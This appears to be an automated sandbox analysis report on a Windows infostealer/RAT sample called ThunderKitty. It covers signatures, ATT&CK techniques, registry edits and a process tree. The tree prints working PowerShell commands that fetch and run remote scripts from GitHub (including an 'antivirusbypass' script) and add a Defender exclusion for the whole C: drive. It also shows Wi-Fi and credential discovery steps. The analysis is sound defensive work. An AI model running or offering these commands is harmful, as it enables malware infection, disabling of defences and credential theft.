Analysis
-
max time kernel
136s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/08/2024, 04:27
Behavioral task
behavioral1
Sample
2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe
-
Size
14.0MB
-
MD5
6306c8b9dd7f426c94b26bfe3c8eea0a
-
SHA1
f2677719e81f9aa8c893552605d077c6462867b8
-
SHA256
9e3540f2a70e61ea94d7c79f7b18a242014647693e802d55b0beeca7eee2bcb9
-
SHA512
34689c6c5740d3cb4a73c31b35c7caa0a212f95fc24beae4019a045e28334d8bcb82f9a71c5bb3b5ce147592a4dc9309aedfe82cb8e0221d24256c2809f5674d
-
SSDEEP
196608:ZjVyhpZ9CKRxcoPqJvAcfYmqQoYiPi9S:Zkh3ZRxcoyJ4cfYmnT
Malware Config
Extracted
https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 15 3112 powershell.exe 16 540 powershell.exe 26 3232 powershell.exe -
pid Process 3112 powershell.exe 540 powershell.exe 3232 powershell.exe 516 powershell.exe 3420 PowerShell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4776 netsh.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 14 raw.githubusercontent.com 15 raw.githubusercontent.com 16 raw.githubusercontent.com 26 raw.githubusercontent.com -
pid Process 4740 ARP.EXE -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Thunder_Kitty.jpg" 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2640 netsh.exe 4304 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 3656 NETSTAT.EXE -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 4844 ipconfig.exe 3656 NETSTAT.EXE 2792 ipconfig.exe -
Kills process with taskkill 1 IoCs
pid Process 2588 taskkill.exe -
Modifies Control Panel 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\TileWallpaper = "0" 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\Desktop\WallpaperStyle = "2" 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 540 powershell.exe 3420 PowerShell.exe 516 powershell.exe 3112 powershell.exe 3420 PowerShell.exe 540 powershell.exe 516 powershell.exe 3112 powershell.exe 3112 powershell.exe 3112 powershell.exe 3232 powershell.exe 3232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 540 powershell.exe Token: SeDebugPrivilege 3420 PowerShell.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: 33 940 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 940 AUDIODG.EXE Token: SeDebugPrivilege 2588 taskkill.exe Token: SeIncreaseQuotaPrivilege 3112 powershell.exe Token: SeSecurityPrivilege 3112 powershell.exe Token: SeTakeOwnershipPrivilege 3112 powershell.exe Token: SeLoadDriverPrivilege 3112 powershell.exe Token: SeSystemProfilePrivilege 3112 powershell.exe Token: SeSystemtimePrivilege 3112 powershell.exe Token: SeProfSingleProcessPrivilege 3112 powershell.exe Token: SeIncBasePriorityPrivilege 3112 powershell.exe Token: SeCreatePagefilePrivilege 3112 powershell.exe Token: SeBackupPrivilege 3112 powershell.exe Token: SeRestorePrivilege 3112 powershell.exe Token: SeShutdownPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeSystemEnvironmentPrivilege 3112 powershell.exe Token: SeRemoteShutdownPrivilege 3112 powershell.exe Token: SeUndockPrivilege 3112 powershell.exe Token: SeManageVolumePrivilege 3112 powershell.exe Token: 33 3112 powershell.exe Token: 34 3112 powershell.exe Token: 35 3112 powershell.exe Token: 36 3112 powershell.exe Token: SeIncreaseQuotaPrivilege 3112 powershell.exe Token: SeSecurityPrivilege 3112 powershell.exe Token: SeTakeOwnershipPrivilege 3112 powershell.exe Token: SeLoadDriverPrivilege 3112 powershell.exe Token: SeSystemProfilePrivilege 3112 powershell.exe Token: SeSystemtimePrivilege 3112 powershell.exe Token: SeProfSingleProcessPrivilege 3112 powershell.exe Token: SeIncBasePriorityPrivilege 3112 powershell.exe Token: SeCreatePagefilePrivilege 3112 powershell.exe Token: SeBackupPrivilege 3112 powershell.exe Token: SeRestorePrivilege 3112 powershell.exe Token: SeShutdownPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeSystemEnvironmentPrivilege 3112 powershell.exe Token: SeRemoteShutdownPrivilege 3112 powershell.exe Token: SeUndockPrivilege 3112 powershell.exe Token: SeManageVolumePrivilege 3112 powershell.exe Token: 33 3112 powershell.exe Token: 34 3112 powershell.exe Token: 35 3112 powershell.exe Token: 36 3112 powershell.exe Token: SeIncreaseQuotaPrivilege 3112 powershell.exe Token: SeSecurityPrivilege 3112 powershell.exe Token: SeTakeOwnershipPrivilege 3112 powershell.exe Token: SeLoadDriverPrivilege 3112 powershell.exe Token: SeSystemProfilePrivilege 3112 powershell.exe Token: SeSystemtimePrivilege 3112 powershell.exe Token: SeProfSingleProcessPrivilege 3112 powershell.exe Token: SeIncBasePriorityPrivilege 3112 powershell.exe Token: SeCreatePagefilePrivilege 3112 powershell.exe Token: SeBackupPrivilege 3112 powershell.exe Token: SeRestorePrivilege 3112 powershell.exe Token: SeShutdownPrivilege 3112 powershell.exe Token: SeDebugPrivilege 3112 powershell.exe Token: SeSystemEnvironmentPrivilege 3112 powershell.exe Token: SeRemoteShutdownPrivilege 3112 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4908 wrote to memory of 3112 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 85 PID 4908 wrote to memory of 3112 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 85 PID 4908 wrote to memory of 540 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 87 PID 4908 wrote to memory of 540 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 87 PID 4908 wrote to memory of 516 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 88 PID 4908 wrote to memory of 516 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 88 PID 4908 wrote to memory of 3420 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 89 PID 4908 wrote to memory of 3420 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 89 PID 4908 wrote to memory of 1872 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 90 PID 4908 wrote to memory of 1872 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 90 PID 4908 wrote to memory of 2232 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 91 PID 4908 wrote to memory of 2232 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 91 PID 4908 wrote to memory of 3612 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 92 PID 4908 wrote to memory of 3612 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 92 PID 1872 wrote to memory of 4532 1872 cmd.exe 93 PID 1872 wrote to memory of 4532 1872 cmd.exe 93 PID 540 wrote to memory of 4664 540 powershell.exe 94 PID 540 wrote to memory of 4664 540 powershell.exe 94 PID 3112 wrote to memory of 1388 3112 powershell.exe 95 PID 3112 wrote to memory of 1388 3112 powershell.exe 95 PID 4664 wrote to memory of 4116 4664 csc.exe 96 PID 4664 wrote to memory of 4116 4664 csc.exe 96 PID 1388 wrote to memory of 1096 1388 csc.exe 97 PID 1388 wrote to memory of 1096 1388 csc.exe 97 PID 4908 wrote to memory of 2588 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 100 PID 4908 wrote to memory of 2588 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 100 PID 3112 wrote to memory of 2640 3112 powershell.exe 103 PID 3112 wrote to memory of 2640 3112 powershell.exe 103 PID 4908 wrote to memory of 3232 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 105 PID 4908 wrote to memory of 3232 4908 2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe 105 PID 3232 wrote to memory of 1600 3232 powershell.exe 106 PID 3232 wrote to memory of 1600 3232 powershell.exe 106 PID 3112 wrote to memory of 4388 3112 powershell.exe 107 PID 3112 wrote to memory of 4388 3112 powershell.exe 107 PID 4388 wrote to memory of 2500 4388 net.exe 108 PID 4388 wrote to memory of 2500 4388 net.exe 108 PID 1600 wrote to memory of 5100 1600 csc.exe 109 PID 1600 wrote to memory of 5100 1600 csc.exe 109 PID 3112 wrote to memory of 4776 3112 powershell.exe 110 PID 3112 wrote to memory of 4776 3112 powershell.exe 110 PID 3112 wrote to memory of 1168 3112 powershell.exe 111 PID 3112 wrote to memory of 1168 3112 powershell.exe 111 PID 3112 wrote to memory of 2348 3112 powershell.exe 112 PID 3112 wrote to memory of 2348 3112 powershell.exe 112 PID 2348 wrote to memory of 2236 2348 net.exe 113 PID 2348 wrote to memory of 2236 2348 net.exe 113 PID 3112 wrote to memory of 4844 3112 powershell.exe 114 PID 3112 wrote to memory of 4844 3112 powershell.exe 114 PID 3112 wrote to memory of 1520 3112 powershell.exe 115 PID 3112 wrote to memory of 1520 3112 powershell.exe 115 PID 1520 wrote to memory of 1992 1520 net.exe 116 PID 1520 wrote to memory of 1992 1520 net.exe 116 PID 3112 wrote to memory of 3236 3112 powershell.exe 117 PID 3112 wrote to memory of 3236 3112 powershell.exe 117 PID 3112 wrote to memory of 3656 3112 powershell.exe 118 PID 3112 wrote to memory of 3656 3112 powershell.exe 118 PID 3112 wrote to memory of 976 3112 powershell.exe 119 PID 3112 wrote to memory of 976 3112 powershell.exe 119 PID 3112 wrote to memory of 2792 3112 powershell.exe 120 PID 3112 wrote to memory of 2792 3112 powershell.exe 120 PID 3112 wrote to memory of 5016 3112 powershell.exe 121 PID 3112 wrote to memory of 5016 3112 powershell.exe 121 PID 3112 wrote to memory of 4740 3112 powershell.exe 122 PID 3112 wrote to memory of 4740 3112 powershell.exe 122 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 3612 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-25_6306c8b9dd7f426c94b26bfe3c8eea0a_poet-rat_snatch.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aqjq0dh4\aqjq0dh4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB8C1.tmp" "c:\Users\Admin\AppData\Local\Temp\aqjq0dh4\CSC32F7FA706BA342FC8B8A58409BEEC249.TMP"4⤵PID:1096
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2640
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:2500
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4776
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵PID:1168
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:2236
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
PID:4844
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:1992
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵PID:3236
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
PID:3656
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵PID:976
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
PID:2792
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵PID:5016
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
PID:4740
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4304
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/antivirusbypass.ps1')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xrr40alp\xrr40alp.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB882.tmp" "c:\Users\Admin\AppData\Local\Temp\xrr40alp\CSCD9452996B36F4B7B99B5DEF928F07273.TMP"4⤵PID:4116
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exePowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\system32\cmd.execmd /c rundll32.exe user32.dll,SwapMouseButton2⤵
- Suspicious use of WriteProcessMemory
PID:1872 -
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,SwapMouseButton3⤵PID:4532
-
-
-
C:\Windows\system32\cmd.execmd.exe /c start facebook.com2⤵PID:2232
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps12⤵
- Views/modifies file attributes
PID:3612
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM wallpaper32.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gtcvzijr\gtcvzijr.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2B4.tmp" "c:\Users\Admin\AppData\Local\Temp\gtcvzijr\CSCB63CF249BEA34E0391207E6455539A8.TMP"4⤵PID:5100
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x360 0x4081⤵
- Suspicious use of AdjustPrivilegeToken
PID:940
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
